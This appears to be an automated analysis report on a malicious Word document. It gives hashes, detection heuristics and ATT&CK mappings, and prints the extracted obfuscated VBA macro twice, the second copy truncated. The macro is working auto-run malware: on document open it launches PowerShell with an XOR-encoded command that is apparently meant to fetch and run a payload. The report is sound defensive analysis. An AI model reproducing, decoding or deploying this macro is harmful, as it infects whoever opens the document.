Office (OLE) malware analysis — malicious · d9e23108633f2279

MALICIOUS

Office (OLE)

113.5 KB Created: 2018-06-13 14:34:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 4c2a8f02f6ea94e6ef6c99ccfbf59a41 SHA-1: 6d6b27637867c9de70260633a87a3c996f4a7b1f SHA-256: d9e23108633f22794cb98e8f1dfff5a6efdaecbd71cd670b73ba5e8a50690327

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The ClamAV detection and the presence of obfuscated VBA code strongly indicate malicious intent.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6874677-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874677-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51))))
lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758)
JQbTQ = Tan(69001)

Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11269 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11269 bytes
SHA-256: `2b9454bd35ea4b7fe0ac70476726f216e2e9dbb3680d0c8e94b1275134d10174`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zmzacfKXZmGN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lEDuh() On Error Resume Next sqWNMw = Tan(54876) Growrd = Tan(56470) oKcnk = ZLObpX JsBujD = CDbl(viJjv) TPqbT = jicIX fajFPh = CDbl(sVAdi * CDbl(IhFXnq + Int(DCoaMN * Rnd(75370)) * oKEwZL * Log(24614 * mHwPL - TKwEpb + Fix(51)))) qiTPz = Tan(65238) IPioUE = Tan(39551) jicOvU = dHOTvG zZDRjN = CDbl(rYYMD) ZzOCRb = PuXdU anbwXY = CDbl(uHhkd * CDbl(tUsjib + Int(LmqBu * Rnd(12477)) * tbQIMR * Log(59924 * vsRcJ - pWvdRl + Fix(51)))) kLhTr = Tan(23554) kPVTX = Tan(6992) cwSOL = NWfXFE EIiSvP = CDbl(zmjjA) VaLvW = SjvfQM FjPTmD = CDbl(wXCCZw * CDbl(cHJEh + Int(tAbhA * Rnd(82936)) * NAkWSZ * Log(73770 * BvOho - MEvQoO + Fix(51)))) jdkODu = Tan(41510) TsfBun = Tan(85788) ztMvmY = OSPhn rKdEb = CDbl(LmqiM) hvfTfj = YvYjP iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51)))) lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758) JQbTQ = Tan(69001) cvAUfY = Tan(28372) qQfppc = vEwwJ UrIWi = CDbl(oszQu) CIPDV = fVYUN MIYNM = CDbl(KSTNT * CDbl(NARvjS + Int(vjrQPq * Rnd(57399)) * WZUwZ * Log(49674 * sBsOH - ZKXDLO + Fix(51)))) bBaaZ = Tan(98775) vsjXzX = Tan(76774) BLpXK = rZbkSX XNjac = CDbl(ipIqD) ThFlS = ABjYTN RNZTfw = CDbl(Usswzi * CDbl(vjsNS + Int(wsqMk * Rnd(11064)) * imDkG * Log(93591 * lObGuc - zIStXj + Fix(51)))) End Function Private Sub Document_open() On Error Resume Next piuUN = Tan(12943) MrbwP = Tan(37903) mMqOX = ziPTJ LEXvkG = CDbl(CzZld) DHSjzl = dQjzWM UcKOm = CDbl(EJXmpz * CDbl(VAmmoV + Int(jiQGqq * Rnd(26887)) * qVmQOQ * Log(86750 * fTHVIz - AXrUB + Fix(51)))) ddLRww = Tan(6420) ZqaMq = Tan(38318) bwLlCf = AwGqZR zwYCY = CDbl(ubhjkf) lQPTWp = Sicaw Yuzdh = CDbl(vVYZX * CDbl(oYoHmh + Int(SjWVN * Rnd(68164)) * iPktf * Log(74819 * YERRV - qpFYl + Fix(51)))) lEDuh zKPECu = Tan(48319) srbff = Tan(61559) mNACs = bnIJVs UiFLpL = CDbl(NKrCsw) QiWfQv = rcLMSa cIbGqA = CDbl(qRWzD * CDbl(mjLddp + Int(XwDPR * Rnd(57947)) * pfZTE * Log(10869 * WBozMt - fVrCw + Fix(51)))) wDunY = Tan(36475) mPitOf = Tan(49838) rwcIA = IVdoJ VdDXKc = CDbl(rbGCXv) PjaHC = fOijjP FcJEz = CDbl(kCdCt * CDbl(WlYPGz + Int(UfbYl * Rnd(88508)) * QsbWz * Log(43858 * SVpoz - YoQtpC + Fix(51)))) End Sub Attribute VB_Name = "ANhITwOwsmRo" Function TPOwucort() On Error Resume Next KsPmQ = cXHrF FAqQIZ = Tan(56605) MkWvK = Tan(84194) lFTtY = GTKsn uVlbvj = CDbl(lJoVD * CDbl(vaATTb + Int(WQZHYm * Rnd(68233)) * PMdkUh * Log(14921 * bJbMsG - zkQud + Fix(51)))) dCIzSV = CDbl(KkiRnp) hCUVGnJ = "HeL" + "L -joIN ( " + "'20P82u115d122" + "~105P99d115~" + "16S13u16E94P85" OiwjKG = lsYksH hPjLU = Tan(63511) JMnUL = Tan(15043) ozGSMZ = Smzidq jpzAVJ = CDbl(TGvRuF * CDbl(kXQWJ + Int(BcDZD * Rnd(24479)) * jpYZNP * Log(31713 * WpTqwC - qLBSU + Fix(51)))) EmXzJd = CDbl(iiVDip) GvkcXAYjoAY = "A71d29S95J" + "82l90f85A83d" + "68J16E66d81~94" + "~84J95f93S11P20" + "P117P95A66u127P" + "101~86u16u1" + "3l16u9" + "4d85P71E2" LrXZn = FnzQj mOios = Tan(20365) ZoOti = Tan(40578) kRWhV = qIpwn pTjmiJ = CDbl(PTtzMQ * CDbl(qEtHJ + Int(UKdRaz * Rnd(79085)) * pdCawN * Log(35724 * tCkkIF - qRJQA + Fix(51)))) pPMiUc = CDbl(qqZPCC) mzwBLSnAiYG = "9l95E" + "82E90J85E" + "83l68u16A99" + "~73f6" jMPKsA = UHGZZ dFjOiw = Tan(86991) iCOUmE = Tan(6194) tdpFPf = OzsuNz bXLOE = CDbl(ZBQvvf * CDbl(XbVmKz + Int(OhBRJ * Rnd(14558)) * qnGWVr * Log(39441 * rJXAHO - NuKkiH + Fix(51)))) tFzMi = CDbl(KZZod) oEiztQ = "7~68u85P93A30S" + "126l85" + "~68J3" + "0S103d85l82A11" + "5f92u89A85" + "E94" TPOwucort = hCUVGnJ + GvkcXAYjoAY + mzwBLSnAiYG + oEiztQ End Function Function AKzQqV() On Error Resume Next DTfKz = iFGDF zatiS = Tan(31199) DKAmGI = Tan(47031) WPSCuf = CUlvEL RqYWh = CDbl(YOnfX * CDbl(fDJmSf + Int(NNwzH * Rnd(94927)) * rRmVd * Log(39398 * zsKNk - wKIcmf + Fix(51)))) zpUsR = CDbl(MhGbS) ahaiIpIXHLG = "l68A11P20S104" + "S65l120d1" + "24S90" + "P16~13A16E23P8" + "8E68l68l64S10" + "~31S3" uKqGn = oPDcvm YaXkIZ = Tan(44608) LcmVR = Tan(47238) DNUSK = RwLOQ jJkbq = CDbl(QuJjL * CDbl(ujAhol + Int(QhXPoj * Rnd(2231)) * mhbWr * Log(78992 * ZKaAw - BiuTC + Fix(51)))) VJuvs = CDbl(wdMhMU) FRPrkVZ = "1l67l95u92~8" + "1S66" + "S94u85l2" + "9P67d" + "70P89l85S6" + "8~89d84A92u81" vNXiv = COMDL YuAKC = Tan(97723) cvPzT = Tan(94939) oiQPf = HDYRN iUdPj = CDbl(VjikRj * CDbl(IjMDNP + Int(PAQPu * Rnd(51108)) * fikrlP * Log(79569 * ozfiT - NlDMjQ + Fix(51)))) hENVGB = CDbl(BztjQJ) lnzkUzPjqf = "l30P83E95d93" + "P31~8" + "3u" + "68J83~92S2J65" + "f99J31P112P" nRuMEG = MTRBd aAjUZw = Tan(50562) EHnkj = Tan(68348) wWjlK = SILnKj HTchc = CDbl(GioTrK * CDbl(wziNN + Int(wALhM * Rnd(54638)) * BdIqa * Log(4409 * sCliG - AciJD + Fix(51)))) jSwmQE = CDbl(idaws) ZfPVbl = "88S68J68~6" + "4P10E3" + "1f31J67J71" + "~89l94u87" + "S90J81l64A81" + "P94S30l83" + "A95A93S31" + "l91E4d" EpcoWY = cGLRc KqTzp = Tan(25393) BNVIj = Tan(84377) EnZFz = CrWzH KCnil = CDbl(UrTlP * CDbl(uIvCB + Int(UqGrk * Rnd(99685)) * oMpEOq * Log(39876 * qSSOi - AOAjTX + Fix(51)))) QETRnq = CDbl(vfnFvv) zdLZFjjSU = "83d93S64P" + "95d31u" + "112S88E68" + "E68E64u1" DcnbiY = dwYzPS fafuF = Tan(46102) dWWFY = Tan(55502) smzBao = EjNbXc GAqKSo = CDbl(ozHzL * CDbl(TZIhj + Int(EwRqb * Rnd(25848)) * mQttju * Log(99013 * XVfuFo - EorCPS + Fix(51)))) oKPzkC = CDbl(vEXFLj) zVpXDKwZaf = "0P" + "31S31f84l8" + "5f91E95u66l9" + "3J83J30d" + "64u92~31" IUMBIS = tntGoG ftlhTB = Tan(19036) SNppbD = Tan(66827) QwUmn = kTzDi bzrTb = CDbl(pLLqzV * CDbl(IdqiPk + Int(NsMqGr * Rnd(70882)) * sibuhv * Log(18056 * VVObO - zZzzD + Fix(51)))) lBNjPE = CDbl(hPFnn) qLVAzb = "E9" + "0f67E" + "31P70l117P" + "102f2S71P31J" + "112S88P68d68J6" + "4l10~31J31" + "A71f" + "71S71d30E87d6" + "4d92" AKzQqV = ahaiIpIXHLG + FRPrkVZ + lnzkUzPjqf + ZfPVbl + zdLZFjjSU + zVpXDKwZaf + qLVAzb End Function Function kCnVZ() On Error Resume Next ViPuS = PMkoo LlipM = Tan(6711) wtuaf = Tan(72229) jUIiMK = SKrLP WZYfKj = CDbl(qwHGv * CDbl(wTnVf + Int(CYZzE * Rnd(45031)) * IlacBu * Log(48837 * iZUOPw - klMCj + Fix(51)))) GwZUH = CDbl(biPVG) XKRGVcKZwYb = "u8" + "1S71l73A85~66d6" + "7A30A85l" + "69P31f97~86u8" + "9d2u116" + "f119P" + "31J" + "112S88J68J" + "68l64l10d3" HuwiZ = cZUYLA hmfqz = Tan(3098) Bnswzw = Tan(76536) rMUlzA = BUiUQ qNVwq = CDbl(izrbR * CDbl(mSUVi + Int(ThRUIN * Rnd(57113)) * SzNrBU * Log(47136 * LZXAJk - rAkCd + Fix(51)))) pWEHSw = CDbl(jkzZzj) TmoRPU = "1P31E71E71" + "J7" + "1f30d67A8" + "1l8" + "9S87f81E66f30J8" pLowD = JvfKm wjzEB = Tan(74918) kMhBCS = Tan(80331) pVPhNr = HAKEt ashMa = CDbl(GPBjw * CDbl(OIXCw + Int(iuOSZ * Rnd(66910)) * MqHSTN * Log(12594 * aKTAp - zjbnoT + Fix(51)))) zsITw = CDbl(Nczzi) mdDvhUwH = "3l95~93l31P1" + "00~126S118" + "S81A69" + "d72~31A23~30d99" + "f64~9" TwGww = YqJWlf QRqOB = Tan(89181) kPjNHJ = Tan(26186) ajHhB = BZOWki UiEKk = CDbl(CsruoG * CDbl(jjjzUp + Int(QsIEGw * Rnd(7730)) * khIaH * Log(49233 * lcDWO - ZjmSb + Fix(51)))) pcVAEo = CDbl(BHJlOw) CUYPmNBw = "2A89E68P24l" + "23P112S2" + "3P25S11d20J" + "91l83S120l83d" + "103u16" + "S13E1" ciWJNB = qaVwh ZTVsD = Tan(66778) njuSH = Tan(61544) knPcz = YKRZAE TzTjSD = CDbl(XwSwO * CDbl(PCRNq + Int(imTfii * Rnd(95052)) * CNYjV * Log(62983 * FpPKA - MplVR + Fix(51)))) WqASk = CDbl(UnQJa) rHsUj = "6l20" + "d82E115l122d1" + "05A99" + "J115J30S94d85P7" wlqAdD = JlYZN LSiZL = Tan(84517) RRXwj = Tan(40774) BzKMF = fFfQv LmoiDJ = CDbl(qAsvA * CDbl(SITnzq + Int(oFhdXK * Rnd(8797)) * WzLKZQ * Log(42601 * cmTnY - UIDJSn + Fix(51)))) FLHtE = CDbl(TChka) OjFofcRh = "2E68u24P1A28" + "A16~1J9A5u4" + "S2f0l25" + "d11S20J115f9" + "6P123u81E" + "89~92P16" + "E13S16S20~" + "85E94J70E10S6" wSIfj = Nkhtjd CuXTW = Tan(71764) RaLfcl = Tan(27597) QRRfa = EKRbSj riVREV = CDbl(iUjltB * CDbl(sIXEzM + Int(jTZVC * Rnd(40852)) * wTwGi * Log(4428 * wqOYPP - vlflZv + Fix(51)))) KwvBA = CDbl(jAjfOz) QIvAG = "8d85S93P64P1" + "6P27~16A23A108" + "~23S1" + "6~27S16" + "P20J91u8" + "3f120u83u103l16" + "E27" zTiPb = ipXoIC zpbST = Tan(81380) vwZYnI = Tan(32664) ltTWP = GuBzX iPkls = CDbl(ZXacCL * CDbl(awnbL + Int(GizLYp * Rnd(16527)) * aHqjt * Log(23850 * rjMnj - jtpIr + Fix(51)))) RrkDL = CDbl(jPzQkw) fBTRQwml = "J16~23E3" + "0l85f72~85S23f1" + "1J86~95~66J85A" + "81P83A" + "88J24P20f67A71" + "S96" + "u119P92l82" + "E16d89d94f1" + "6A20S104J65E12" + "0E1" wNMdWb = CwwLE WCjCrG = Tan(22408) iJiwoW = Tan(81337) vMHcAr = njdEMi fHLrf = CDbl(StDcB * CDbl(NalAbN + Int(WEHbn * Rnd(51801)) * hCnLDq * Log(97556 * dXnzri - BIibW + Fix(51)))) XfYQj = CDbl(PGsZLf) kNiqws = "24~90E25d75P" + "68A66A7" + "3P7" + "5A20" + "J117u95E6" + "6f12" + "7f101f8" + "6P30J116A95u71" + "J94S92d95P" + "81P84u118A89S9" WwVXO = KOtaVw orhsow = Tan(45816) KADIM = Tan(68043) WFrPhI = EuQFQq ZoXYVf = CDbl(BZjML * CDbl(UPDjM + Int(sRqWww * Rnd(26668)) * wIhrvN * Log(56445 * LjkrEi - jIDVs + Fix(51)))) RabHDK = CDbl(rrQzmj) nUjZqBJrwHm = "2d85f24~20E67J" + "71l96E119u" + "92A82d30u100u" + "95~99A68A" + "66~89E94" + "P87" + "f24E25P28d16" + "u20S115S9" + "6S1" + "23P81u89d92A25u" kCnVZ = XKRGVcKZwYb + TmoRPU + mdDvhUwH + CUYPmNBw + rHsUj + OjFofcRh + QIvAG + fBTRQwml + kNiqws + nUjZqBJrwHm End Function Function ULzbvSo() On Error Resume Next HajaQ = CCEUr tSwzXc = Tan(80532) QAzHP = Tan(10635) tGIjA = bpQmX wkUjW = CDbl(jaYDj * CDbl(lHAcr + Int(JihhKQ * Rnd(80444)) * WvVVzH * Log(5384 * AZvQc - fidqZH + Fix(51)))) OaDtk = CDbl(oFDGZw) fOUmlSz = "11f99" + "l6" + "8P81u66f68S2" + "9f96~66d95u8" + "3P85E67P67~16" + "d20~11" + "5P96J" + "123l81E89" + "f92J11" + "E82S66l85A81A" Vmmbc = fPaMFt Mviirt = Tan(5883) nccWXZ = Tan(58316) slzsX = wrZZjA dmsSX = CDbl(JnVJF * CDbl(LwRMi + Int(julcVa * Rnd(77919)) * YWLcf * Log(69838 * YKqjEA - UZXct + Fix(51)))) XARRd = CDbl(jncsi) VmLUtaP = "91E" + "11" + "S77S83~81" + "~68E83A88l" + "75u71~66A89d" LmHRj = ucvPB amAXF = Tan(69326) Ircrjl = Tan(72255) lBJYSa = hhwizY ZIDCN = CDbl(niLvY * CDbl(UdHvwH + Int(ojlcCJ * Rnd(5478)) * htPavI * Log(97965 * UoiXX - HpNAiG + Fix(51)))) ofBsKN = CDbl(lwUcb) oQsQBhOCaJ = "68d" + "85~29f88" + "l95J67u68f1" + "6P20" + "S111f30d117" + "E72l83A85u64P6" + "8J89P95A9" + "4f30l125A85f6" + "7f" vBKfC = BjTWz VwtnrL = Tan(54510) wwHHPD = Tan(81557) Ycomm = KnVst Gkrni = CDbl(nkpwsQ * CDbl(QOQzih + Int(mDzjw * Rnd(39063)) * WKHGCV * Log(57647 * MFTcj - GjajX + Fix(51)))) DnHoKC = CDbl(Zhrpv) wBLWOXZzzdD = "67l81" + "E87A85J11A77l" + "77'." + "SpLIt('" + "JES~ludPAf' )" + " \|ForEaCh {[" + "cHar]( " + "$_-" + "bXOr'0x30'" JTZBA = jquTX kEYoIv = Tan(51748) jKXRUP = Tan(83088) sSZziR = wjCjtc awiIo = CDbl(bFjQI * CDbl(dsuIN + Int(wBddcN * Rnd(1849)) * XDzRnF * Log(96507 * jaiLb - SmjIpQ + Fix(51)))) wUVHDn = CDbl(GRcCP) GBrZDzChPV = " )} ) \|& ( $Ps" + "HoME[4]+$PsHO" + "Me[30]+'x')" ULzbvSo = fOUmlSz + VmLUtaP + oQsQBhOCaJ + wBLWOXZzzdD + GBrZDzChPV End Function

SHA-256: 2b9454bd35ea4b7fe0ac70476726f216e2e9dbb3680d0c8e94b1275134d10174

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zmzacfKXZmGN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lEDuh()
On Error Resume Next
sqWNMw = Tan(54876)
Growrd = Tan(56470)
oKcnk = ZLObpX
JsBujD = CDbl(viJjv)
TPqbT = jicIX
fajFPh = CDbl(sVAdi * CDbl(IhFXnq + Int(DCoaMN * Rnd(75370)) * oKEwZL * Log(24614 * mHwPL - TKwEpb + Fix(51))))
qiTPz = Tan(65238)
IPioUE = Tan(39551)
jicOvU = dHOTvG
zZDRjN = CDbl(rYYMD)
ZzOCRb = PuXdU
anbwXY = CDbl(uHhkd * CDbl(tUsjib + Int(LmqBu * Rnd(12477)) * tbQIMR * Log(59924 * vsRcJ - pWvdRl + Fix(51))))
kLhTr = Tan(23554)
kPVTX = Tan(6992)
cwSOL = NWfXFE
EIiSvP = CDbl(zmjjA)
VaLvW = SjvfQM
FjPTmD = CDbl(wXCCZw * CDbl(cHJEh + Int(tAbhA * Rnd(82936)) * NAkWSZ * Log(73770 * BvOho - MEvQoO + Fix(51))))
jdkODu = Tan(41510)
TsfBun = Tan(85788)
ztMvmY = OSPhn
rKdEb = CDbl(LmqiM)
hvfTfj = YvYjP
iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51))))
lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758)
JQbTQ = Tan(69001)
cvAUfY = Tan(28372)
qQfppc = vEwwJ
UrIWi = CDbl(oszQu)
CIPDV = fVYUN
MIYNM = CDbl(KSTNT * CDbl(NARvjS + Int(vjrQPq * Rnd(57399)) * WZUwZ * Log(49674 * sBsOH - ZKXDLO + Fix(51))))
bBaaZ = Tan(98775)
vsjXzX = Tan(76774)
BLpXK = rZbkSX
XNjac = CDbl(ipIqD)
ThFlS = ABjYTN
RNZTfw = CDbl(Usswzi * CDbl(vjsNS + Int(wsqMk * Rnd(11064)) * imDkG * Log(93591 * lObGuc - zIStXj + Fix(51))))
End Function
Private Sub Document_open()
On Error Resume Next
piuUN = Tan(12943)
MrbwP = Tan(37903)
mMqOX = ziPTJ
LEXvkG = CDbl(CzZld)
DHSjzl = dQjzWM
UcKOm = CDbl(EJXmpz * CDbl(VAmmoV + Int(jiQGqq * Rnd(26887)) * qVmQOQ * Log(86750 * fTHVIz - AXrUB + Fix(51))))
ddLRww = Tan(6420)
ZqaMq = Tan(38318)
bwLlCf = AwGqZR
zwYCY = CDbl(ubhjkf)
lQPTWp = Sicaw
Yuzdh = CDbl(vVYZX * CDbl(oYoHmh + Int(SjWVN * Rnd(68164)) * iPktf * Log(74819 * YERRV - qpFYl + Fix(51))))
lEDuh
zKPECu = Tan(48319)
srbff = Tan(61559)
mNACs = bnIJVs
UiFLpL = CDbl(NKrCsw)
QiWfQv = rcLMSa
cIbGqA = CDbl(qRWzD * CDbl(mjLddp + Int(XwDPR * Rnd(57947)) * pfZTE * Log(10869 * WBozMt - fVrCw + Fix(51))))
wDunY = Tan(36475)
mPitOf = Tan(49838)
rwcIA = IVdoJ
VdDXKc = CDbl(rbGCXv)
PjaHC = fOijjP
FcJEz = CDbl(kCdCt * CDbl(WlYPGz + Int(UfbYl * Rnd(88508)) * QsbWz * Log(43858 * SVpoz - YoQtpC + Fix(51))))
End Sub


Attribute VB_Name = "ANhITwOwsmRo"
Function TPOwucort()
On Error Resume Next
KsPmQ = cXHrF
FAqQIZ = Tan(56605)
MkWvK = Tan(84194)
lFTtY = GTKsn
uVlbvj = CDbl(lJoVD * CDbl(vaATTb + Int(WQZHYm * Rnd(68233)) * PMdkUh * Log(14921 * bJbMsG - zkQud + Fix(51))))
dCIzSV = CDbl(KkiRnp)
hCUVGnJ = "HeL" + "L -joIN ( " + "'20P82u115d122" + "~105P99d115~" + "16S13u16E94P85"
OiwjKG = lsYksH
hPjLU = Tan(63511)
JMnUL = Tan(15043)
ozGSMZ = Smzidq
jpzAVJ = CDbl(TGvRuF * CDbl(kXQWJ + Int(BcDZD * Rnd(24479)) * jpYZNP * Log(31713 * WpTqwC - qLBSU + Fix(51))))
EmXzJd = CDbl(iiVDip)
GvkcXAYjoAY = "A71d29S95J" + "82l90f85A83d" + "68J16E66d81~94" + "~84J95f93S11P20" + "P117P95A66u127P" + "101~86u16u1" + "3l16u9" + "4d85P71E2"
LrXZn = FnzQj
mOios = Tan(20365)
ZoOti = Tan(40578)
kRWhV = qIpwn
pTjmiJ = CDbl(PTtzMQ * CDbl(qEtHJ + Int(UKdRaz * Rnd(79085)) * pdCawN * Log(35724 * tCkkIF - qRJQA + Fix(51))))
pPMiUc = CDbl(qqZPCC)
mzwBLSnAiYG = "9l95E" + "82E90J85E" + "83l68u16A99" + "~73f6"
jMPKsA = UHGZZ
dFjOiw = Tan(86991)
iCOUmE = Tan(6194)
tdpFPf = OzsuNz
bXLOE = CDbl(ZBQvvf * CDbl(XbVmKz + Int(OhBRJ * Rnd(14558)) * qnGWVr * Log(39441 * rJXAHO - NuKkiH + Fix(51))))
tFzMi = CDbl(KZZod)
oEiztQ = "7~68u85P93A30S" + "126l85" + "~68J3" + "0S103d85l82A11" + "5f92u89A85" + "E94"
TPOwucort = hCUVGnJ + GvkcXAYjoAY + mzwBLSnAiYG + oEiztQ
End Function
Function AKzQqV()
On Error Resume Next
DTfKz = iFGDF
zatiS = Tan(31199)
DKAmGI = Tan(47031)
WPSCuf = CUlvEL
RqYWh = CDbl(YOnfX * CDbl(fDJmSf + Int(NNwzH * Rnd(94927)) * rRmVd * Log(39398 * zsKNk - wKIcmf + Fix(51))))
zpUsR = CDbl(MhGbS)
ahaiIpIXHLG = "l68A11P20S104" + "S65l120d1" + "24S90" + "P16~13A16E23P8" + "8E68l68l64S10" + "~31S3"
uKqGn = oPDcvm
YaXkIZ = Tan(44608)
LcmVR = Tan(47238)
DNUSK = RwLOQ
jJkbq = CDbl(QuJjL * CDbl(ujAhol + Int(QhXPoj * Rnd(2231)) * mhbWr * Log(78992 * ZKaAw - BiuTC + Fix(51))))
VJuvs = CDbl(wdMhMU)
FRPrkVZ = "1l67l95u92~8" + "1S66" + "S94u85l2" + "9P67d" + "70P89l85S6" + "8~89d84A92u81"
vNXiv = COMDL
YuAKC = Tan(97723)
cvPzT = Tan(94939)
oiQPf = HDYRN
iUdPj = CDbl(VjikRj * CDbl(IjMDNP + Int(PAQPu * Rnd(51108)) * fikrlP * Log(79569 * ozfiT - NlDMjQ + Fix(51))))
hENVGB = CDbl(BztjQJ)
lnzkUzPjqf = "l30P83E95d93" + "P31~8" + "3u" + "68J83~92S2J65" + "f99J31P112P"
nRuMEG = MTRBd
aAjUZw = Tan(50562)
EHnkj = Tan(68348)
wWjlK = SILnKj
HTchc = CDbl(GioTrK * CDbl(wziNN + Int(wALhM * Rnd(54638)) * BdIqa * Log(4409 * sCliG - AciJD + Fix(51))))
jSwmQE = CDbl(idaws)
ZfPVbl = "88S68J68~6" + "4P10E3" + "1f31J67J71" + "~89l94u87" + "S90J81l64A81" + "P94S30l83" + "A95A93S31" + "l91E4d"
EpcoWY = cGLRc
KqTzp = Tan(25393)
BNVIj = Tan(84377)
EnZFz = CrWzH
KCnil = CDbl(UrTlP * CDbl(uIvCB + Int(UqGrk * Rnd(99685)) * oMpEOq * Log(39876 * qSSOi - AOAjTX + Fix(51))))
QETRnq = CDbl(vfnFvv)
zdLZFjjSU = "83d93S64P" + "95d31u" + "112S88E68" + "E68E64u1"
DcnbiY = dwYzPS
fafuF = Tan(46102)
dWWFY = Tan(55502)
smzBao = EjNbXc
GAqKSo = CDbl(ozHzL * CDbl(TZIhj + Int(EwRqb * Rnd(25848)) * mQttju * Log(99013 * XVfuFo - EorCPS + Fix(51))))
oKPzkC = CDbl(vEXFLj)
zVpXDKwZaf = "0P" + "31S31f84l8" + "5f91E95u66l9" + "3J83J30d" + "64u92~31"
IUMBIS = tntGoG
ftlhTB = Tan(19036)
SNppbD = Tan(66827)
QwUmn = kTzDi
bzrTb = CDbl(pLLqzV * CDbl(IdqiPk + Int(NsMqGr * Rnd(70882)) * sibuhv * Log(18056 * VVObO - zZzzD + Fix(51))))
lBNjPE = CDbl(hPFnn)
qLVAzb = "E9" + "0f67E" + "31P70l117P" + "102f2S71P31J" + "112S88P68d68J6" + "4l10~31J31" + "A71f" + "71S71d30E87d6" + "4d92"
AKzQqV = ahaiIpIXHLG + FRPrkVZ + lnzkUzPjqf + ZfPVbl + zdLZFjjSU + zVpXDKwZaf + qLVAzb
End Function
Function kCnVZ()
On Error Resume Next
ViPuS = PMkoo
LlipM = Tan(6711)
wtuaf = Tan(72229)
jUIiMK = SKrLP
WZYfKj = CDbl(qwHGv * CDbl(wTnVf + Int(CYZzE * Rnd(45031)) * IlacBu * Log(48837 * iZUOPw - klMCj + Fix(51))))
GwZUH = CDbl(biPVG)
XKRGVcKZwYb = "u8" + "1S71l73A85~66d6" + "7A30A85l" + "69P31f97~86u8" + "9d2u116" + "f119P" + "31J" + "112S88J68J" + "68l64l10d3"
HuwiZ = cZUYLA
hmfqz = Tan(3098)
Bnswzw = Tan(76536)
rMUlzA = BUiUQ
qNVwq = CDbl(izrbR * CDbl(mSUVi + Int(ThRUIN * Rnd(57113)) * SzNrBU * Log(47136 * LZXAJk - rAkCd + Fix(51))))
pWEHSw = CDbl(jkzZzj)
TmoRPU = "1P31E71E71" + "J7" + "1f30d67A8" + "1l8" + "9S87f81E66f30J8"
pLowD = JvfKm
wjzEB = Tan(74918)
kMhBCS = Tan(80331)
pVPhNr = HAKEt
ashMa = CDbl(GPBjw * CDbl(OIXCw + Int(iuOSZ * Rnd(66910)) * MqHSTN * Log(12594 * aKTAp - zjbnoT + Fix(51))))
zsITw = CDbl(Nczzi)
mdDvhUwH = "3l95~93l31P1" + "00~126S118" + "S81A69" + "d72~31A23~30d99" + "f64~9"
TwGww = YqJWlf
QRqOB = Tan(89181)
kPjNHJ = Tan(26186)
ajHhB = BZOWki
UiEKk = CDbl(CsruoG * CDbl(jjjzUp + Int(QsIEGw * Rnd(7730)) * khIaH * Log(49233 * lcDWO - ZjmSb + Fix(51))))
pcVAEo = CDbl(BHJlOw)
CUYPmNBw = "2A89E68P24l" + "23P112S2" + "3P25S11d20J" + "91l83S120l83d" + "103u16" + "S13E1"
ciWJNB = qaVwh
ZTVsD = Tan(66778)
njuSH = Tan(61544)
knPcz = YKRZAE
TzTjSD = CDbl(XwSwO * CDbl(PCRNq + Int(imTfii * Rnd(95052)) * CNYjV * Log(62983 * FpPKA - MplVR + Fix(51))))
WqASk = CDbl(UnQJa)
rHsUj = "6l20" + "d82E115l122d1" + "05A99" + "J115J30S94d85P7"
wlqAdD = JlYZN
LSiZL = Tan(84517)
RRXwj = Tan(40774)
BzKMF = fFfQv
LmoiDJ = CDbl(qAsvA * CDbl(SITnzq + Int(oFhdXK * Rnd(8797)) * WzLKZQ * Log(42601 * cmTnY - UIDJSn + Fix(51))))
FLHtE = CDbl(TChka)
OjFofcRh = "2E68u24P1A28" + "A16~1J9A5u4" + "S2f0l25" + "d11S20J115f9" + "6P123u81E" + "89~92P16" + "E13S16S20~" + "85E94J70E10S6"
